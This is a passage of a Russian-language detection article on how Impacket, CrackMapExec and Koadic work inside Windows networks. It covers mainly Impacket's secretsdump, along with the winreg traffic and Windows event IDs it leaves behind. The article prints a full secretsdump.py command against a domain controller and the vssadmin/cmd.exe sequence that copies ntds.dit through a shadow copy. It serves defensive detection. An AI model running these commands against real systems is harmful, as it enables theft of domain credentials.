Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²

Π‘ ΠΊΠ°ΠΆΠ΄Ρ‹ΠΌ Π³ΠΎΠ΄ΠΎΠΌ растСт количСство Π°Ρ‚Π°ΠΊ Π² ΠΊΠΎΡ€ΠΏΠΎΡ€Π°Ρ‚ΠΈΠ²Π½ΠΎΠΌ сСкторС: Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€ Π² 2017 Π³ΠΎΠ΄Ρƒ зафиксировали Π½Π° 13% большС ΡƒΠ½ΠΈΠΊΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚ΠΎΠ² Ρ‡Π΅ΠΌ Π² 2016 Π³., Π° ΠΏΠΎ ΠΈΡ‚ΠΎΠ³Π°ΠΌ 2018 β€” Π½Π° 27% большС ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚ΠΎΠ², Ρ‡Π΅ΠΌ Π² ΠΏΡ€Π΅Π΄Ρ‹Π΄ΡƒΡ‰Π΅ΠΌ ΠΏΠ΅Ρ€ΠΈΠΎΠ΄Π΅. Π’ Ρ‚ΠΎΠΌ числС ΠΈ Ρ‚Π΅Ρ…, Π³Π΄Π΅ основным Ρ€Π°Π±ΠΎΡ‡ΠΈΠΌ инструмСнтом являСтся опСрационная систСма Windows. Π’ 2017β€”2018 Π³ΠΎΠ΄Π°Ρ… Π³Ρ€ΡƒΠΏΠΏΠΈΡ€ΠΎΠ²ΠΊΠΈ APT Dragonfly, APT28, APT MuddyWater ΠΏΡ€ΠΎΠ²ΠΎΠ΄ΠΈΠ»ΠΈ Π°Ρ‚Π°ΠΊΠΈ Π½Π° ΠΏΡ€Π°Π²ΠΈΡ‚Π΅Π»ΡŒΡΡ‚Π²Π΅Π½Π½Ρ‹Π΅ ΠΈ Π²ΠΎΠ΅Π½Π½Ρ‹Π΅ ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΈ Π•Π²Ρ€ΠΎΠΏΡ‹, Π‘Π΅Π²Π΅Ρ€Π½ΠΎΠΉ АмСрики ΠΈ Баудовской Аравии. И использовали для этого Ρ‚Ρ€ΠΈ инструмСнта β€” Impacket, CrackMapExec ΠΈ Koadic. Π˜Ρ… исходный ΠΊΠΎΠ΄ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ ΠΈ доступСн Π½Π° GitHub.

Π‘Ρ‚ΠΎΠΈΡ‚ ΠΎΡ‚ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ, Ρ‡Ρ‚ΠΎ эти инструмСнты ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ Π½Π΅ для ΠΏΠ΅Ρ€Π²ΠΈΡ‡Π½ΠΎΠ³ΠΎ проникновСния, Π° для развития Π°Ρ‚Π°ΠΊΠΈ Π²Π½ΡƒΡ‚Ρ€ΠΈ инфраструктуры. Π—Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ ΠΈΡ… Π½Π° Ρ€Π°Π·Π½Ρ‹Ρ… стадиях Π°Ρ‚Π°ΠΊΠΈ, ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΡ… послС прСодолСния ΠΏΠ΅Ρ€ΠΈΠΌΠ΅Ρ‚Ρ€Π°. Π­Ρ‚ΠΎ, ΠΊ слову ΡΠΊΠ°Π·Π°Ρ‚ΡŒ, слоТно дСтСктируСтся ΠΈ Π·Π°Ρ‡Π°ΡΡ‚ΡƒΡŽ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΉ выявлСния слСдов ΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚Π°Ρ†ΠΈΠΈ Π² сСтСвом Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ΅ ΠΈΠ»ΠΈ инструмСнтов, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰ΠΈΡ… ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹Π΅ дСйствия Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠ° послС проникновСния Π΅Π³ΠΎ Π² инфраструктуру. Π˜Π½ΡΡ‚Ρ€ΡƒΠΌΠ΅Π½Ρ‚Ρ‹ ΠΎΠ±Π΅ΡΠΏΠ΅Ρ‡ΠΈΠ²Π°ΡŽΡ‚ мноТСство Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΉ β€” ΠΎΡ‚ ΠΏΠ΅Ρ€Π΅Π΄Π°Ρ‡ΠΈ Ρ„Π°ΠΉΠ»ΠΎΠ² Π΄ΠΎ взаимодСйствия с рССстром ΠΈ выполнСния ΠΊΠΎΠΌΠ°Π½Π΄ Π½Π° ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΉ машинС. ΠœΡ‹ ΠΏΡ€ΠΎΠ²Π΅Π»ΠΈ исслСдованиС этих инструмСнтов, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΎΠΏΡ€Π΅Π΄Π΅Π»ΠΈΡ‚ΡŒ ΠΈΡ… ΡΠ΅Ρ‚Π΅Π²ΡƒΡŽ Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΡΡ‚ΡŒ.

Π§Ρ‚ΠΎ Π½Π°ΠΌ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ Π±Ρ‹Π»ΠΎ ΡΠ΄Π΅Π»Π°Ρ‚ΡŒ:

  • ΠŸΠΎΠ½ΡΡ‚ΡŒ, ΠΊΠ°ΠΊ Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚ хакСрский инструмСнтарий. Π£Π·Π½Π°Ρ‚ΡŒ, Ρ‡Ρ‚ΠΎ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΌ для эксплуатации ΠΈ ΠΊΠ°ΠΊΠΈΠΌΠΈ тСхнологиями ΠΎΠ½ΠΈ ΠΌΠΎΠ³ΡƒΡ‚ Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ.
  • Найти Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ Π½Π΅ дСтСктируСтся срСдствами ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ бСзопасности Π½Π° ΠΏΠ΅Ρ€Π²Ρ‹Ρ… стадиях Π°Ρ‚Π°ΠΊΠΈ. Бтадия Ρ€Π°Π·Π²Π΅Π΄ΠΊΠΈ ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΡ€ΠΎΠΏΡƒΡ‰Π΅Π½Π°, Π»ΠΈΠ±ΠΎ ΠΏΠΎΡ‚ΠΎΠΌΡƒ Ρ‡Ρ‚ΠΎ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΌ выступаСт Π²Π½ΡƒΡ‚Ρ€Π΅Π½Π½ΠΈΠΉ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊ, Π»ΠΈΠ±ΠΎ ΠΏΠΎΡ‚ΠΎΠΌΡƒ Ρ‡Ρ‚ΠΎ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΉ ΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ Π±Ρ€Π΅ΡˆΡŒΡŽ Π² инфраструктурС, ΠΎ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ Π½Π΅ Π±Ρ‹Π»ΠΎ извСстно Ρ€Π°Π½Π΅Π΅. ΠŸΠΎΡΠ²Π»ΡΠ΅Ρ‚ΡΡ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ Π²ΠΎΡΡΡ‚Π°Π½ΠΎΠ²ΠΈΡ‚ΡŒ всю Ρ†Π΅ΠΏΠΎΡ‡ΠΊΡƒ Π΅Π³ΠΎ дСйствий, ΠΎΡ‚ΡΡŽΠ΄Π° Π²ΠΎΠ·Π½ΠΈΠΊΠ°Π΅Ρ‚ ΠΆΠ΅Π»Π°Π½ΠΈΠ΅ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°Ρ‚ΡŒ дальнСйшСС ΠΏΠ΅Ρ€Π΅Π΄Π²ΠΈΠΆΠ΅Π½ΠΈΠ΅.
  • Π£ΡΡ‚Ρ€Π°Π½ΠΈΡ‚ΡŒ Π»ΠΎΠΆΠ½Ρ‹Π΅ срабатывания срСдств обнаруТСния Π²Ρ‚ΠΎΡ€ΠΆΠ΅Π½ΠΈΠΉ. НСльзя Π·Π°Π±Ρ‹Π²Π°Ρ‚ΡŒ ΠΈ ΠΎ Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΈ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠΈ Ρ‚Π΅Ρ… ΠΈΠ»ΠΈ ΠΈΠ½Ρ‹Ρ… дСйствий Π½Π° основС ΠΎΠ΄Π½ΠΎΠΉ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ€Π°Π·Π²Π΅Π΄ΠΊΠΈ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ‹ частыС ошибки. ΠžΠ±Ρ‹Ρ‡Π½ΠΎ Π² инфраструктурС сущСствуСт достаточноС количСство способов, Π½Π΅ΠΎΡ‚Π»ΠΈΡ‡ΠΈΠΌΡ‹Ρ… ΠΎΡ‚ Π»Π΅Π³ΠΈΡ‚ΠΈΠΌΠ½Ρ‹Ρ… Π½Π° ΠΏΠ΅Ρ€Π²Ρ‹ΠΉ взгляд, ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΊΠ°ΠΊΡƒΡŽ-Π»ΠΈΠ±ΠΎ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ.

Π§Ρ‚ΠΎ ΠΆΠ΅ Π΄Π°ΡŽΡ‚ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΌ эти инструмСнты? Если это Impacket, Ρ‚ΠΎ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΈ ΠΏΠΎΠ»ΡƒΡ‡Π°ΡŽΡ‚ Π±ΠΎΠ»ΡŒΡˆΡƒΡŽ Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΡƒ ΠΌΠΎΠ΄ΡƒΠ»Π΅ΠΉ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΌΠΎΠΆΠ½ΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Π½Π° Ρ€Π°Π·Π½Ρ‹Ρ… стадиях Π°Ρ‚Π°ΠΊΠΈ, ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΡ… послС прСодолСния ΠΏΠ΅Ρ€ΠΈΠΌΠ΅Ρ‚Ρ€Π°. МногиС инструмСнты ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ ΠΌΠΎΠ΄ΡƒΠ»ΠΈ Impacket Ρƒ сСбя Π²Π½ΡƒΡ‚Ρ€ΠΈ β€” Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, Metasploit. Π’ Π½Π΅ΠΌ ΠΈΠΌΠ΅ΡŽΡ‚ΡΡ dcomexec ΠΈ wmiexec для ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠΌΠ°Π½Π΄, secretsdump для получСния ΡƒΡ‡Π΅Ρ‚Π½Ρ‹Ρ… записСй ΠΈΠ· памяти, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π΄ΠΎΠ±Π°Π²Π»Π΅Π½Ρ‹ ΠΈΠ· Impacket. Π’ ΠΈΡ‚ΠΎΠ³Π΅ ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎΠ΅ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠ΅ активности Ρ‚Π°ΠΊΠΎΠΉ Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠΈ обСспСчит ΠΈ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ΄Π½Ρ‹Ρ….

О CrackMapExec (ΠΈΠ»ΠΈ просто CME) создатСли нСслучайно написали Β«Powered by ImpacketΒ». ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, CME ΠΈΠΌΠ΅Π΅Ρ‚ Π² сСбС Π³ΠΎΡ‚ΠΎΠ²ΡƒΡŽ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ для популярных сцСнариСв: это ΠΈ Mimikatz для получСния ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΉ ΠΈΠ»ΠΈ ΠΈΡ… Ρ…Π΅ΡˆΠ΅ΠΉ, ΠΈ Π²Π½Π΅Π΄Ρ€Π΅Π½ΠΈΠ΅ Meterpreter Π»ΠΈΠ±ΠΎ Empire agent для ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ исполнСния, ΠΈ Bloodhound Π½Π° Π±ΠΎΡ€Ρ‚Ρƒ.

Π’Ρ€Π΅Ρ‚ΠΈΠΉ Π²Ρ‹Π±Ρ€Π°Π½Π½Ρ‹ΠΉ Π½Π°ΠΌΠΈ инструмСнт β€” Koadic. Он достаточно свСТ, Π±Ρ‹Π» прСдставлСн Π½Π° ΠΌΠ΅ΠΆΠ΄ΡƒΠ½Π°Ρ€ΠΎΠ΄Π½ΠΎΠΉ хакСрской ΠΊΠΎΠ½Ρ„Π΅Ρ€Π΅Π½Ρ†ΠΈΠΈ DEFCON 25 Π² 2017 Π³ΠΎΠ΄Ρƒ ΠΈ отличаСтся нСстандартным ΠΏΠΎΠ΄Ρ…ΠΎΠ΄ΠΎΠΌ: Ρ€Π°Π±ΠΎΡ‚ΠΎΠΉ Ρ‡Π΅Ρ€Π΅Π· HTTP, Java Script ΠΈ Microsoft Visual Basic Script (VBS). Π’Π°ΠΊΠΎΠΉ ΠΏΠΎΠ΄Ρ…ΠΎΠ΄ Π½Π°Π·Ρ‹Π²Π°ΡŽΡ‚ living off the land: инструмСнт ΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ Π½Π°Π±ΠΎΡ€ΠΎΠΌ зависимостСй ΠΈ Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊ, встроСнных Π² Windows. Π‘ΠΎΠ·Π΄Π°Ρ‚Π΅Π»ΠΈ Π½Π°Π·Ρ‹Π²Π°ΡŽΡ‚ Π΅Π³ΠΎ COM Π‘ommand & Π‘ontrol, ΠΈΠ»ΠΈ Π‘3.

IMPACKET

Π€ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ Impacket вСсьма ΡˆΠΈΡ€ΠΎΠΊΠ°, начиная ΠΎΡ‚ Ρ€Π°Π·Π²Π΅Π΄ΠΊΠΈ Π²Π½ΡƒΡ‚Ρ€ΠΈ AD ΠΈ сбора Π΄Π°Π½Π½Ρ‹Ρ… с Π²Π½ΡƒΡ‚Ρ€Π΅Π½Π½ΠΈΡ… сСрвСров MS SQL, заканчивая Ρ‚Π΅Ρ…Π½ΠΈΠΊΠ°ΠΌΠΈ для получСния ΡƒΡ‡Π΅Ρ‚Π½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ…: это ΠΈ Π°Ρ‚Π°ΠΊΠ° SMB relay, ΠΈ ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠ΅ с ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π»Π΅Ρ€Π° Π΄ΠΎΠΌΠ΅Π½Π° Ρ„Π°ΠΉΠ»Π° ntds.dit, содСрТащСго Ρ…Π΅ΡˆΠΈ ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΉ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ. Π’Π°ΠΊΠΆΠ΅ Impacket ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎ выполняСт ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ Ρ‡Π΅Ρ‚Ρ‹Ρ€Π΅ Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… способа: Ρ‡Π΅Ρ€Π΅Π· WMI, сСрвис для управлСния ΠΏΠ»Π°Π½ΠΈΡ€ΠΎΠ²Ρ‰ΠΈΠΊΠΎΠΌ Windows, DCOM ΠΈ SMB, ΠΈ для этого Π΅ΠΌΡƒ Π½ΡƒΠΆΠ½Ρ‹ ΡƒΡ‡Π΅Ρ‚Π½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅.

Secretsdump

Π”Π°Π²Π°ΠΉΡ‚Π΅ рассмотрим secretsdump. Π­Ρ‚ΠΎ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ, Ρ†Π΅Π»ΡŒΡŽ ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ ΠΊΠ°ΠΊ ΠΌΠ°ΡˆΠΈΠ½Ρ‹ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ, Ρ‚Π°ΠΊ ΠΈ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π»Π΅Ρ€Ρ‹ Π΄ΠΎΠΌΠ΅Π½Π°. Π‘ Π΅Π³ΠΎ ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡƒΡ‡Π°Ρ‚ΡŒ ΠΊΠΎΠΏΠΈΠΈ областСй памяти LSA, SAM, SECURITY, NTDS.dit, поэтому Π΅Π³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ ΡƒΠ²ΠΈΠ΄Π΅Ρ‚ΡŒ Π½Π° Ρ€Π°Π·Π½Ρ‹Ρ… стадиях Π°Ρ‚Π°ΠΊΠΈ. ΠŸΠ΅Ρ€Π²Ρ‹ΠΌ шагом Π² Ρ€Π°Π±ΠΎΡ‚Π΅ модуля являСтся аутСнтификация Ρ‡Π΅Ρ€Π΅Π· SMB, для ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌ Π»ΠΈΠ±ΠΎ ΠΏΠ°Ρ€ΠΎΠ»ΡŒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ, Π»ΠΈΠ±ΠΎ Π΅Π³ΠΎ Ρ…Π΅Ρˆ для автоматичСского провСдСния Π°Ρ‚Π°ΠΊΠΈ Pass the Hash. Π”Π°Π»Π΅Π΅ ΠΈΠ΄Π΅Ρ‚ запрос Π½Π° ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠ΅ доступа ΠΊ Service Control Manager (SCM) ΠΈ ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠ΅ доступа ΠΊ рССстру ΠΏΠΎ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρƒ winreg, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΉ ΠΌΠΎΠΆΠ΅Ρ‚ ΡƒΠ·Π½Π°Ρ‚ΡŒ Π΄Π°Π½Π½Ρ‹Π΅ ΠΈΠ½Ρ‚Π΅Ρ€Π΅ΡΡƒΡŽΡ‰ΠΈΡ… Π΅Π³ΠΎ Π²Π΅Ρ‚ΠΎΠΊ ΠΈ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Ρ‹ Ρ‡Π΅Ρ€Π΅Π· SMB.

На рис. 1 ΠΌΡ‹ Π²ΠΈΠ΄ΠΈΠΌ, ΠΊΠ°ΠΊ ΠΈΠΌΠ΅Π½Π½ΠΎ ΠΏΡ€ΠΈ использовании ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Π° winreg происходит ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠ΅ доступа ΠΏΠΎ ΠΊΠ»ΡŽΡ‡Ρƒ рССстра с LSA. Для этого ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Π° DCERPC с opcode 15 β€” OpenKey.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 1. ΠžΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠ΅ ΠΊΠ»ΡŽΡ‡Π° рССстра ΠΏΠΎ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρƒ winreg

Π”Π°Π»Π΅Π΅, ΠΊΠΎΠ³Π΄Π° доступ ΠΏΠΎ ΠΊΠ»ΡŽΡ‡Ρƒ ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½, происходит сохранСниС Π·Π½Π°Ρ‡Π΅Π½ΠΈΠΉ ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ SaveKey с opcode 20. Impacket Π΄Π΅Π»Π°Π΅Ρ‚ это вСсьма спСцифично. Он сохраняСт значСния Π² Ρ„Π°ΠΉΠ», имя ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ β€” это строка ΠΈΠ· 8 случайных символов с Π΄ΠΎΠ±Π°Π²Π»Π΅Π½ΠΈΠ΅ΠΌ .tmp. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, дальнСйшая Π²Ρ‹Π³Ρ€ΡƒΠ·ΠΊΠ° этого Ρ„Π°ΠΉΠ»Π° происходит Ρ‡Π΅Ρ€Π΅Π· SMB ΠΈΠ· Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ System32 (рис. 2).

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 2. Π‘Ρ…Π΅ΠΌΠ° получСния ΠΊΠ»ΡŽΡ‡Π° рССстра с ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΉ ΠΌΠ°ΡˆΠΈΠ½Ρ‹

Π’Ρ‹Ρ…ΠΎΠ΄ΠΈΡ‚, ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ ΠΏΠΎΠ΄ΠΎΠ±Π½ΡƒΡŽ Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΡΡ‚ΡŒ Π² сСти ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎ запросам ΠΊ ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½Ρ‹ΠΌ Π²Π΅Ρ‚ΠΊΠ°ΠΌ рССстра ΠΏΠΎ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρƒ winreg, спСцифичным ΠΈΠΌΠ΅Π½Π°ΠΌ, ΠΊΠΎΠΌΠ°Π½Π΄Π°ΠΌ ΠΈ ΠΈΡ… порядку.

Π’Π°ΠΊΠΆΠ΅ этот ΠΌΠΎΠ΄ΡƒΠ»ΡŒ оставляСт слСды Π² ΠΆΡƒΡ€Π½Π°Π»Π΅ событий Windows, благодаря ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ ΠΎΠ½ Π»Π΅Π³ΠΊΠΎ обнаруТиваСтся. НапримСр, Π² Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ выполнСния ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Π² ΠΆΡƒΡ€Π½Π°Π»Π΅ Windows Server 2016 ΡƒΠ²ΠΈΠ΄ΠΈΠΌ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΡƒΡŽ ΠΊΠ»ΡŽΡ‡Π΅Π²ΡƒΡŽ ΠΏΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ событий:

1. 4624 β€” ΡƒΠ΄Π°Π»Π΅Π½Π½Ρ‹ΠΉ Logon.
2. 5145 β€” ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° ΠΏΡ€Π°Π² доступа ΠΊ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌΡƒ сСрвису winreg.
3. 5145 β€” ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° ΠΏΡ€Π°Π² доступа ΠΊ Ρ„Π°ΠΉΠ»Ρƒ Π² Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ System32. Π€Π°ΠΉΠ» ΠΈΠΌΠ΅Π΅Ρ‚ случайноС имя, упомянутоС Π²Ρ‹ΡˆΠ΅.
4. 4688 β€” созданиС процСсса cmd.exe, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ запускаСт vssadmin:

β€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 β€” созданиС процСсса с ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 β€” созданиС процСсса с ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 β€” созданиС процСсса с ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

